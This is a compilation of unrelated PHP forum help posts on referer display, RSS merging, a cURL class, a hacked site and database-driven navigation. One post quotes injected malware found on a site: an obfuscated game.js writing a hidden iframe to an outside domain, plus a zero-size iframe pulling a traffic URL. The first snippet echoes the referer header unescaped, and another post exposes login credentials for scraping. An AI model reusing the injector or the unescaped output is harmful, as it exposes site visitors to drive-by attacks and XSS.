PHP - Xss Problems With My Site

now i use this code to show where the visitors came from to my site.

<?php
$referer=$_SERVER['HTTP_REFERER'];
echo $referer;
?>

now, i want to show the  5 latest vistors referer's site url on my site ?

Not sure if I'm trying to achieve something totally crazy here, or if this is something pretty standard. Didn't have much luck with searching as I'm not fully down with all the terms.

(A) I have one site providing an RSS feed.
(B) I have one site I want to search, once for each of the items in the feed A.
(C) I want the results of the search in (B) to be displayed on page (C).

So for example, the feed on (A) says;

apples
bananas
oranges
cheese

I want site (B) to search for each of those terms (by passing the item in the feed (A) to the ?search= part of the URL of that page) and then show the results from THAT search on page C. Bit of a complex one, let me know if you need me to clarify. Thanks for any help! 

I'm currently running a classified ads site and planning to display my own content from database combined with and external site rss. So here is what i got right now after the db query for the jobs ads (procedural php),

while ($row = mysqli_fetch_array($results, MYSQLI_ASSOC)){


echo '<div class="media margin-none">
<a class="pull-left bg-inverse innerAll text-center" href="#"><img src="'.$foto.'" share_alt="" width="100" height="100"></a>
<div class="media-body innerAll">
<h4 class="media-heading innerT">
<a href="' . $row['title'] .'-da' . $row['id_ad'] . '" class="text-inverse">'. $remuneracion .' &nbsp; ' . substr(ucfirst(strtolower($row['title'])), 0, 53) . '</a> <small class="pull-right label label-default"><i class="fa fa-fw fa-calendar-o"></i> ' . $row['date_created'] . '</small></h4>
<p>' . substr(ucfirst(strtolower($row['description'])), 0, 80) . ' ...</p>';

echo '</div>
</div>
<div class="col-separator-h"></div>';
}

echo pagination($statement,$per_page,$page, $url_filtros, $filtros);
?>

it is the while loop that i use to display ads from my database, what could be the best way to display (in this same loop?) other site's rss feed so i can show my content combined with the external rss? Thanks

Transferring data from sub-domain.site.com
Reading sub-domain.site.com

What is this all about?
I'm going to put all .. images into a separate sub-domain eg: images.site.com.
This would create a folder inside my public_HTML called "images"

Now when sites have that Transferring data, and Reading... is this .. something relating to what I want. Facebook also does it, and they get their images for the site from a sub domain, how is it all done?

I'm not sure if its entirely PHP, but I hope someone can help.

Thanks

Hi I made a new design for my website and I made some changes. I want to use layout for my second site. I'll like to know if my site is easier to browse through now and if you like the design better?. I test my site on internet explorer, chrome, and firefox. It is best to use site on better browsers like firefox and chrome to get a better experience of site. Thanks.   http://adjade.com

This topic has been moved to mod_rewrite.

http://www.phpfreaks.com/forums/index.php?topic=318858.0

class curl2{

    private $curl_init; 
    private $CURLOPT_URL;

    public function connect(){ 
       $this->curl_init = curl_init(); 
    }

    public function debug(){
 
       curl_setopt($this->curl_init, CURLOPT_VERBOSE, TRUE);
       $fp = fopen("curl2.txt", "w"); 
       curl_setopt($this->curl_init, CURLOPT_STDERR, $fp); 
       curl_setopt($this->curl_init, CURLOPT_RETURNTRANSFER, TRUE);

    }

    public function setUrl($url = null){
       $this->CURLOPT_URL = $url;
       curl_setopt($this->curl_init, CURLOPT_URL, $this->CURLOPT_URL);
    }

    public function execute(){

       $out = curl_exec($this->curl_init);
       curl_close($this->curl_init);

       return $out;
    }
}

$curl2 = new curl2;
$curl2->connect();
$curl2->setUrl("http://www.linuxformat.co.uk");
$curl2->debug();
echo $curl2->execute();



It display a blank page like attachment result1.jpg, but if I move the
$fp = fopen("curl2.txt", "w"); 
curl_setopt($this->curl_init, CURLOPT_STDERR, $fp); 
curl_setopt($this->curl_init, CURLOPT_RETURNTRANSFER, TRUE);
from function debug() and join it with function execute()
like this:
  public function execute(){
       $fp = fopen("curl2.txt", "w"); 
       curl_setopt($this->curl_init, CURLOPT_STDERR, $fp); 
       curl_setopt($this->curl_init, CURLOPT_RETURNTRANSFER, TRUE);

       $out = curl_exec($this->curl_init);
       curl_close($this->curl_init);

       return $out;
    }

it return me Linuxformat content ( expected result ) like result2.jpg

below is the working code :
class curl2{

    private $curl_init; 
    private $CURLOPT_URL;

    public function connect(){ 
       $this->curl_init = curl_init(); 
    }

    public function debug(){
 
       curl_setopt($this->curl_init, CURLOPT_VERBOSE, TRUE);
      

    }

    public function setUrl($url = null){
       $this->CURLOPT_URL = $url;
       curl_setopt($this->curl_init, CURLOPT_URL, $this->CURLOPT_URL);
    }

    public function execute(){
       $fp = fopen("curl2.txt", "w"); 
       curl_setopt($this->curl_init, CURLOPT_STDERR, $fp); 
       curl_setopt($this->curl_init, CURLOPT_RETURNTRANSFER, TRUE);

       $out = curl_exec($this->curl_init);
       curl_close($this->curl_init);

       return $out;
    }
}

$curl2 = new curl2;
$curl2->connect();
$curl2->setUrl("http://www.linuxformat.co.uk");
$curl2->debug();
echo $curl2->execute();

 
Why I couldn't split "CURLOPT_STDERR, CURLOPT_RETURNTRANSFER" with "curl_exec"
 

How do I only redirect the page when index.php is present?

How can i make echo "<b>Site:</b> ".$req_user_info['site']."<br>"; linkable
The site raw fron the db contains an site url.
Regards

My website this morning was displaying 2 iframes that I know I never put there in the code:

in index.php:
<script type="text/javascript" charset="ISO-8859-1" src="game.js"></script>

and in my public_html, there was a file called game.js that contained the following:
O="=
100%
iframewidthheig".split('');Q="document.write('< src=
http://lolkatdska.co.in/sTDS/go.php?sid=1
 ht frameborder=
0
margin=0 marginht=0></>');";o="";for(J=3;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(/
/g,'"'));

I am the only person with the login details to my website/cpanel, and I know I never uploaded/modified these files.

I've spoken to my host, but they told me they didn't see anything (because obviously I removed these foreign objects as soon as i noticed them). They don't seem too bothered about a security risk :/

Anyway, I've changed my login details and all that.

I mentioned above that I discovered 2 foreign iframes; the other one I found just a moment ago, again on my index page (but within a file called footer.php)

in footer.php:
<iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe>

How did I not notice this before??? I think it was placed there in the last hour or so, after I removed the first iframe.

This is pretty weird, I changed my login details for cpanel/ftp and all that stuff over an hour ago!!! and since then I've found this new alteration that I never made!

I dunno, maybe it was there along with the game.js iframe but I didn't notice.... but as soon as I fixed the first one, I checked, and everything was fine.

Oh, and also, the php files index and footer are now have twice the number of returns as they originally did.
e.g:
<h1><?php include("ads/index_160x600_1.php"); ?></h1>
<h2><?php include("ads/index_125x125_1.php"); ?></h2>
<h3><?php include("ads/index_125x125_2.php"); ?></h3>
Became:
<h1><?php include("ads/index_160x600_1.php"); ?></h1>

<h2><?php include("ads/index_125x125_1.php"); ?></h2>

<h3><?php include("ads/index_125x125_2.php"); ?></h3>

The only way these files could have been altered is if someone knows my login details... but this just is impossible, how did this happen?
Is any of these weird files/modification familiar to anyone else?

We had a problem with the site a month ago when google suspected our site as some sort of security threat... because we were hosting content from xxxxxxxxx.com, a site we have no affiliation with and doesn't feature on our site at all. It was all quite bizarre and the google thing went away within a day of contacting them.

I have a feeling the same person/thing was behind this also.

HELP!

Folks,

I need to do few scrapping from a Site, problem is, i have to be logged in first to that site to access any content.

Link:

Quote

https://www.majesticseo.com/account/login?redirect=%2Faccount%2Flogin


Login Details a

Quote

Email: wow@mailinator.com
Password: natashaworld


What PHP code do i need to use to login to this site, so i can continue running my other Codes to scrape few data???

Cheers
Natasha T

i am a newbie..

From my tables, what code should i put to put into my site? in text..

Hey Guys

I have created a PHP site for my School, It works perfectly with chrome but when I open IE7 (what my school uses), it wont login. It says Errors on Page. When I press the Login Button.. Nothing Happens.

Any Suggestions ?

I'm new to this blog but need serious help. I want to add a calendar to a Hotel website for the booking part, I did it once but I forgot how to do it. Here is the link to the booking file. http://regencycountryclub.com/QuickReserve.php I just want instead of having to select the day, month and year. I want to add a calendar to select the arrival date and departure date. I would really appreciate the help. Thanks

hello. i wonder if anyone could help me to solve this puzzle.

im trying to create a dynamic navigation using a database but i keep getting stuck.

i have 2 database:

Navigation with :

Quote

id navPos pageID level parent url 1 top 1 1 0 page1.php 2 top 2 2 1 page2.php 3 top 3 3 2 page3.php 4 top 4 3 3 page4.php 5 top 5 3 4 page5.php 6 top 6 3 5 page6.php



and
Pages with:

Quote

id pageName 1 page1 2 page2 3 page3 4 page4 5 page5 6 page6


now, what i want to happen is on each page i have 3 functions. 1 calling the top nav, 1 calling the side nav and 1 calling the bottom nav.

for this each function should have 3 levels.
level 1 = main top level
level 2 = child to main top level
level 3 = child to level 2

so for example.
2 tabs each with 3 levels and 1 page on each level.

TOP NAV
Quote

levels - TAB 1 - TAB 2 LEVEL1 - page1 - page4 LEVEL2 - page2 - page5 LEVEL3 - page3- page6




now for the code. I'LL STICK TO JUST THE TOP NAV FOR NOW.

on the page that will display the navigation's i have:
I WOULD LIKE THEM TO DROP DOWN BUT THIS CODE WILL NOT DO THAT. just lists for now

Code: [Select]
<div id="navWrapper">
<?PHP $navPosion = "top"; ?>

    <div id="LEVEL1" class="LEVEL1">
    <ul><?PHP echo Navigation::NavL1($pageID, $navPosion); ?></ul>
    </div>
    <div id="LEVEL2" class="LEVEL2">
    <ul><?PHP echo Navigation::NavL2($pageID, $navPosion); ?></ul>
    </div>
    <div id="LEVEL3" class="LEVEL3">
    <ul><?PHP echo Navigation::NavL3($pageID, $navPosion); ?></ul>
    </div>
</div>

these is the functions im trying to put together.

in the Navigation class i have.


Code: [Select]
class Navigation extends Pages{-----lots of other code here....


public static function navL1($pageID, $navPosion){

                //FIND CURRENT PAGE ID
$page = new Pages(); //calling just the Pages class.
$CP = $page->find_by_pageID($pageID);
$CPid = $CP->id;



//GET ALL PAGES FROM THE DB
$allP = $page->find_all();

foreach ($allP as $allPs){
$allPname = $allPs->pageName;


//GET INFO FROMTHE NAVIGATION TABLE
$nav2 = new Navigation(); //calling the navigation extension
$Cnav = $nav2->find_all();

foreach ($Cnav as $Cnavs){
$Nid = $Cnavs->id;
$Npos = $Cnavs->navPos;
$Npid = $Cnavs->pageID;
$Nlevel = $Cnavs->level;
$Npnt = $Cnavs->parent;
$Nurl = $Cnavs->url;
$Nord = $Cnavs->order;


if($Nlevel  = '1'){

                //FIND ACTIVE TAB
if($CPid == $allPid){ $selected_tab='class="selected"'; }else{  $selected_tab=''; }

echo '<li><a '.$selected_tab.' href="'.$allPname.'.php">'.$Nlevel.''.$allPname.'</a></li>';

}// if($Nlevel == $navLevel

//} //end Navigation()

    }//end foreach ($allP as $allPs)

} //end getNav($pageID) 



THEN THE SAME AGAIN FOR :

public static function navL2($pageID, $navPosion){
and
public static function navL3($pageID, $navPosion){


what this does is list all the pages

for example navL1 give me
Quote

    page1
    page2
    page3
    page4
    page5
    page6



i want it to only list where level is 1 or 2 or 3

in each of the functions i have this but it does not seem to work.

Code: [Select]
if($Nlevel = "1"){

i tried this but i nothing return.

Code: [Select]
if($Nlevel == "1"){



if i echo this out in navL1
Code: [Select]
echo "<br/>".$Nid = $Cnavs->id;
echo "<br/>".$Npos = $Cnavs->navPos;
echo "<br/>".$Npid = $Cnavs->pageID;
echo "<br/>".$Nlevel = $Cnavs->level;
echo "<br/>".$Npnt = $Cnavs->parent;
echo "<br/>".$Nurl = $Cnavs->url;

it gives me back the last page (page6) 6 time over which is not even level1. its level3

Quote

6
top
6
3
5
page6.php




so its missing the rest of the pages in the loop and just out putting the last one.

i realise that i need more if's in my function but maybe there is a better way ? for example i need an if($Npos == top) and in navL2 and navL3 i need to only show sub tabs under the correct parent. etc...

for now i just want to get what i can working ..

any thoughts ???? maybe i can roll all 3 functions into 1 amazing function ???? that would be nice.

thanks
ricky